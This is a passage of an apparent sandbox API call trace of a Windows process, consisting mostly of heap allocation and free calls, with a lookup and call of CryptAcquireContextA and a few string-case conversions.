(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0258.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0258.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0258.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0258.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0258.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0258.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0258.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0258.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0258.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0258.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0258.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0258.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0258.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0258.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0258.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0258.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0258.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.964] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0258.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0258.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0258.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0258.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0258.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0258.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0258.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0258.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466db0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0258.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0258.966] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0258.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0258.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0258.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0258.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466db0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0258.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0258.967] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0258.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0258.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b39d0 | out: hHeap=0x25c0000) returned 1 [0258.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0258.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0258.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0258.967] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2940) returned 1 [0258.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0258.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0258.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0258.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0258.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0258.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0258.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0258.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0258.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0258.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0258.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0258.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0258.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0258.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0258.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0258.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0258.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0258.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0258.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0258.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0258.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0258.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0258.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0258.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0258.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0258.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0258.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0258.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0258.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0258.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0258.971] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0258.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0258.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0258.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0258.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0258.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0258.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0258.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0258.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0258.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0258.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0258.972] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0258.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0258.972] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0258.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0258.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0258.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1878 [0258.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0258.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0258.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0258.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0258.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0258.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0258.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0258.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0258.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0258.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0258.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0258.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa658 [0258.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0258.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0258.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0258.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0258.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0258.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0258.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0258.974] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0258.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0258.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0258.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0258.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0258.974] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0258.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0258.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0258.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0258.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0258.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0258.975] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0258.975] PeekMessageW (in: lpMsg=0x8bf250, 